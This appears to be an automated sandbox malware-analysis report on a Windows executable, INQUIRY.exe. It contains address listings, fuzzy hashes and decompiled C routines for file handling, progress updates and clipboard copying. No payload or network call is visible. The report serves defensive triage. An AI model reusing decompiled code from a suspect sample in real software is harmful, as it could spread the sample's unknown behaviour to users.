                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x004060b5
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00000000
                          0x0040673a
                          0x00406734
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004066bb
                          0x004066b8

                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                          • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                          • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                          • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b35b8b63c01ba1d8d8bba8d7a1ba96051c35d81bab3d879158d6d6d9c912ee1b
                          • Instruction ID: 43782a2b25cc585e36ea4d2cf317b7eccd294be07ad7f424c2f870b9af91db2b
                          • Opcode Fuzzy Hash: b35b8b63c01ba1d8d8bba8d7a1ba96051c35d81bab3d879158d6d6d9c912ee1b
                          • Instruction Fuzzy Hash: 84F1F129E90358ADEB60CBE4EC65BFEB3B5AF48710F105497E60DEA190E7704A80DF15
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • PathFileExistsW.KERNELBASE(021A1A21,?,?,?,?,?,?,?,?,021A1A21,?), ref: 021A1B71
                          • CreateDirectoryW.KERNELBASE(021A1A21,00000000,?,?,?,?,?,?,?,?,021A1A21,?), ref: 021A1B85
                          Memory Dump Source
                          • Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd
                          Similarity
                          • API ID: CreateDirectoryExistsFilePath
                          • String ID:
                          • API String ID: 2624722123-0
                          • Opcode ID: d6302ff009401f4bd2299211d049a1337e1d04fc8b5aafa2dab8ea7001d5b6bc
                          • Instruction ID: 86ad82a6b43e2f3b5d4623ab2605f52b1da04807b7e712c7c56e05246cdbd845
                          • Opcode Fuzzy Hash: d6302ff009401f4bd2299211d049a1337e1d04fc8b5aafa2dab8ea7001d5b6bc
                          • Instruction Fuzzy Hash: B521A429E90348AEDB50DBF4E821BBEB7B6AF48750F205416E509EA2A0F7714E40DB45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 69%
                          			E00401389(signed int _a4) {
                          				intOrPtr* _t6;
                          				void* _t8;
                          				void* _t10;
                          				signed int _t11;
                          				void* _t12;
                          				intOrPtr _t15;
                          				signed int _t16;
                          				signed int _t17;
                          				void* _t18;
                          
                          				_t17 = _a4;
                          				while(_t17 >= 0) {
                          					_t15 =  *0x423ed0; // 0x51dddc
                          					_t6 = _t17 * 0x1c + _t15;
                          					if( *_t6 == 1) {
                          						break;
                          					}
                          					_push(_t6); // executed
                          					_t8 = E00401434(); // executed
                          					if(_t8 == 0x7fffffff) {
                          						return 0x7fffffff;
                          					}
                          					_t10 = E0040136D(_t8);
                          					if(_t10 != 0) {
                          						_t11 = _t10 - 1;
                          						_t16 = _t17;
                          						_t17 = _t11;
                          						_t12 = _t11 - _t16;
                          					} else {
                          						_t12 = _t10 + 1;
                          						_t17 = _t17 + 1;
                          					}
                          					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                          						 *0x42368c =  *0x42368c + _t12;
                          						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
                          					}
                          				}
                          				return 0;
                          			}












                          0x0040138a
                          0x004013fa
                          0x00401392
                          0x0040139b
                          0x004013a0
                          0x00000000
                          0x00000000
                          0x004013a2
                          0x004013a3
                          0x004013ad
                          0x00000000
                          0x00401404
                          0x004013b0
                          0x004013b7
                          0x004013bd
                          0x004013be
                          0x004013c0
                          0x004013c2
                          0x004013b9
                          0x004013b9
                          0x004013ba
                          0x004013ba
                          0x004013c9
                          0x004013cb
                          0x004013f4
                          0x004013f4
                          0x004013c9
                          0x00000000

                          APIs
                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                          • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                          • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                          • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E0040575C(CHAR* _a4, long _a8, long _a12) {
                          				signed int _t5;
                          				void* _t6;
                          
                          				_t5 = GetFileAttributesA(_a4); // executed
                          				asm("sbb ecx, ecx");
                          				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                          				return _t6;
                          			}





                          0x00405760
                          0x0040576d
                          0x00405782
                          0x00405788

                          APIs
                          • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\INQUIRY.exe,80000000,00000003), ref: 00405760
                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                          • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                          • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                          • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040573D(CHAR* _a4) {
                          				signed char _t3;
                          
                          				_t3 = GetFileAttributesA(_a4); // executed
                          				if(_t3 != 0xffffffff) {
                          					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                          				}
                          				return _t3;
                          			}




                          0x00405741
                          0x0040574a
                          0x00000000
                          0x00405753
                          0x00405759

                          APIs
                          • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                          • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                          • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                          • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004031A8(void* _a4, long _a8) {
                          				int _t6;
                          				long _t10;
                          
                          				_t10 = _a8;
                          				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
                          				if(_t6 == 0 || _a8 != _t10) {
                          					return 0;
                          				} else {
                          					return 1;
                          				}
                          			}





                          0x004031ac
                          0x004031bf
                          0x004031c7
                          0x00000000
                          0x004031ce
                          0x00000000
                          0x004031d0

                          APIs
                          • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                          • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                          • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                          • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004031DA(long _a4) {
                          				long _t2;
                          
                          				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
                          				return _t2;
                          			}




                          0x004031e8
                          0x004031ee

                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,0000B5E4), ref: 004031E8
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                          • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                          • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                          • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                          				struct HWND__* _v8;
                          				long _v12;
                          				struct tagRECT _v28;
                          				void* _v36;
                          				signed int _v40;
                          				int _v44;
                          				int _v48;
                          				signed int _v52;
                          				int _v56;
                          				void* _v60;
                          				void* _v68;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				long _t87;
                          				unsigned int _t92;
                          				unsigned int _t93;
                          				int _t94;
                          				int _t95;
                          				long _t98;
                          				void* _t101;
                          				intOrPtr _t112;
                          				intOrPtr _t123;
                          				struct HWND__* _t127;
                          				int _t149;
                          				int _t150;
                          				struct HWND__* _t154;
                          				struct HWND__* _t158;
                          				struct HMENU__* _t160;
                          				long _t162;
                          				void* _t163;
                          				short* _t164;
                          
                          				_t154 =  *0x423684; // 0x0
                          				_t149 = 0;
                          				_v8 = _t154;
                          				if(_a8 != 0x110) {
                          					__eflags = _a8 - 0x405;
                          					if(_a8 == 0x405) {
                          						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                          					}
                          					__eflags = _a8 - 0x111;
                          					if(_a8 != 0x111) {
                          						L17:
                          						__eflags = _a8 - 0x404;
                          						if(_a8 != 0x404) {
                          							L25:
                          							__eflags = _a8 - 0x7b;
                          							if(_a8 != 0x7b) {
                          								goto L20;
                          							}
                          							__eflags = _a12 - _t154;
                          							if(_a12 != _t154) {
                          								goto L20;
                          							}
                          							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                          							__eflags = _t87 - _t149;
                          							_a8 = _t87;
                          							if(_t87 <= _t149) {
                          								L37:
                          								return 0;
                          							}
                          							_t160 = CreatePopupMenu();
                          							AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
                          							_t92 = _a16;
                          							__eflags = _t92 - 0xffffffff;
                          							if(_t92 != 0xffffffff) {
                          								_t150 = _t92;
                          								_t93 = _t92 >> 0x10;
                          								__eflags = _t93;
                          								_t94 = _t93;
                          							} else {
                          								GetWindowRect(_t154,  &_v28);
                          								_t150 = _v28.left;
                          								_t94 = _v28.top;
                          							}
                          							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                          							_t162 = 1;
                          							__eflags = _t95 - 1;
                          							if(_t95 == 1) {
                          								_v60 = _t149;
                          								_v48 = 0x420498;
                          								_v44 = 0xfff;
                          								_a4 = _a8;
                          								do {
                          									_a4 = _a4 - 1;
                          									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                          									__eflags = _a4 - _t149;
                          									_t162 = _t162 + _t98 + 2;
                          								} while (_a4 != _t149);
                          								OpenClipboard(_t149);
                          								EmptyClipboard();
                          								_t101 = GlobalAlloc(0x42, _t162);
                          								_a4 = _t101;
                          								_t163 = GlobalLock(_t101);
                          								do {
                          									_v48 = _t163;
                          									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                          									 *_t164 = 0xa0d;
                          									_t163 = _t164 + 2;
                          									_t149 = _t149 + 1;
                          									__eflags = _t149 - _a8;
                          								} while (_t149 < _a8);
                          								GlobalUnlock(_a4);
                          								SetClipboardData(1, _a4);
                          								CloseClipboard();
                          							}
                          							goto L37;
                          						}
                          						__eflags =  *0x42366c - _t149; // 0x0
                          						if(__eflags == 0) {
                          							ShowWindow( *0x423ea8, 8);
                          							__eflags =  *0x423f2c - _t149; // 0x0
                          							if(__eflags == 0) {
                          								_t112 =  *0x41fc68; // 0x0
